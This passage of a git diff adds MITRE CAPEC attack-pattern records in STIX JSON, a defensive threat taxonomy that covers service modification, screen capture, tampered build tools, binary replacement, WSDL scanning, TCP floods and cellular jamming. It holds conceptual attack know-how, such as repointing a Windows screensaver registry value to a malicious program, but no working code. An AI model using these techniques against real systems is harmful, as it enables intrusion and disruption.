requests." + ], + "x_capec_resources_required": [ + "The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json new file mode 100644 index 0000000000000000000000000000000000000000..51e37706bef5a244e06788fd3070faaef5ac33b1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json 
@@ -0,0 +1,51 @@
+{
+ "id": "bundle--10793f96-eabc-406f-85f1-25ea3bd8a085",
+ "objects": [
+ {
+ "created": "2015-11-09T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-551",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/551.html"
+ },
+ {
+ "external_id": "CWE-284",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/284.html"
+ },
+ {
+ "external_id": "CWE-522",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/522.html"
+ },
+ {
+ "description": "Create or Modify System Process",
+ "external_id": "T1543",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1543"
+ }
+ ],
+ "id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Modify Existing Service",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a"
+ ],
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json
new file mode 100644
index 0000000000000000000000000000000000000000..071e15a7d76bef7958cf139f8b93729e3029990f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json 
@@ -0,0 +1,68 @@ +{ + "id": "bundle--669a79e2-a0ea-42de-8a50-2090a210da7d", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-648", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/648.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Screen Capture", + "external_id": "T1113", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1113" + }, + { + "description": "Screen Capture", + "external_id": "T1513", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1513" + } + ], + "id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Screen Capture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to capture potentially sensitive information and processes as they appear on the screen.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json new file mode 100644 index 0000000000000000000000000000000000000000..898edf32ac0de477b6e2a4cb4c455c62d979187b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json 
@@ -0,0 +1,92 @@ +{ + "id": "bundle--e4b72343-a035-4004-b739-da1e86c3e14c", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.", + "external_references": [ + { + "external_id": "CAPEC-670", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/670.html" + }, + { + "description": "Trusted Developer Utilities Proxy Execution", + "external_id": "T1127", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1127" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor, 2020--12---13, Schneier on Security", + "external_id": "REF-667", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + } + ], + "id": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Software Development Tools Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software." + ], + "x_capec_skills_required": { + "High": "Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json new file mode 100644 index 0000000000000000000000000000000000000000..ec1f25fdd5ac1ed517c2b0c3125b3977a8bbd8a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json 
@@ -0,0 +1,60 @@ +{ + "id": "bundle--5b4ad572-cd01-410d-ba98-da23cde3e0bb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.", + "external_references": [ + { + "external_id": "CAPEC-166", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/166.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-1221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1221.html" + }, + { + "external_id": "CWE-1232", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1232.html" + } + ], + "id": "attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Force the System to Reset Values", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. 
At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.\n ", + "x_capec_prerequisites": [ + "The targeted application must have a reset function that returns the configuration of the application to an earlier state.", + "The reset functionality must be inadequately protected against use." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker may need special client applications in order to execute the reset functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json new file mode 100644 index 0000000000000000000000000000000000000000..b1860e74de1973aacddc0672dd8526b6fc49bffe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json 
@@ -0,0 +1,48 @@ +{ + "id": "bundle--83ba54eb-b149-4aae-aaeb-ab76d2afc911", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.", + "external_references": [ + { + "external_id": "CAPEC-202", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Create Malicious Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.\n For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. 
Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.\n ", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json new file mode 100644 index 0000000000000000000000000000000000000000..335ff24a766967c4086e4ec846ee430c57174bb2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json 
@@ -0,0 +1,71 @@ +{ + "id": "bundle--ef8c49cf-e55a-49fb-8326-cc9152c6f886", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "external_id": "CAPEC-642", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Compromise Client Software Binary", + "external_id": "T1554", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1554" + }, + { + "description": "Hijack Execution Flow:Executable Installer File Permissions Weakness", + "external_id": "T1574.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/005" + }, + { + "description": "Binary planting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Binary_planting" + } + ], + "id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Binaries", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json new file mode 100644 index 0000000000000000000000000000000000000000..f4cf798be70c0f5544477610c579a179b49ccda3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json 
@@ -0,0 +1,72 @@ +{ + "id": "bundle--9c10c49d-c009-4050-98c7-d37d1dfff80f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "external_id": "CAPEC-95", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-538", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html" + }, + { + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "external_id": "REF-554", + "source_name": "reference_from_CAPEC", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf" + }, + { + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "external_id": "REF-555", + "source_name": "reference_from_CAPEC", + "url": "http://www.informit.com/articles/article.aspx?p=601349" + } + ], + "id": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "modified": "2021-10-21T00:00:00.000Z", + "name": "WSDL Scanning", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. 
A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for WSDL Documents: The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary.

Experiment

  1. Analyze WSDL files: An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified.

Exploit

  1. Craft malicious content: Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json new file mode 100644 index 0000000000000000000000000000000000000000..5d42f088a03086187dfbe71a30c61a0474b1b4ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json 
@@ -0,0 +1,62 @@ +{ + "id": "bundle--bc4417a0-296b-4fed-bff5-4bc10056f684", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This often involves the use of TCP SYN messages.", + "external_references": [ + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TCP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port 
of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json new file mode 100644 index 0000000000000000000000000000000000000000..c8d8f6071f13a07270993f3695745e4ac16879f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json 
@@ -0,0 +1,47 @@ +{ + "id": "bundle--b4549fe8-9c10-4504-b5b4-df4883b93d32", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "external_id": "CAPEC-605", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html" + } + ], + "id": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json new file mode 100644 index 0000000000000000000000000000000000000000..05b6367e348170755da3c8406d5cb440de9c3308 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json 
@@ -0,0 +1,43 @@ +{ + "id": "bundle--15639fd9-af33-48dd-9bcc-b8d5a760faa8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere.", + "external_references": [ + { + "external_id": "CAPEC-179", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/179.html" + } + ], + "id": "attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Calling Micro-Services Directly", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. 
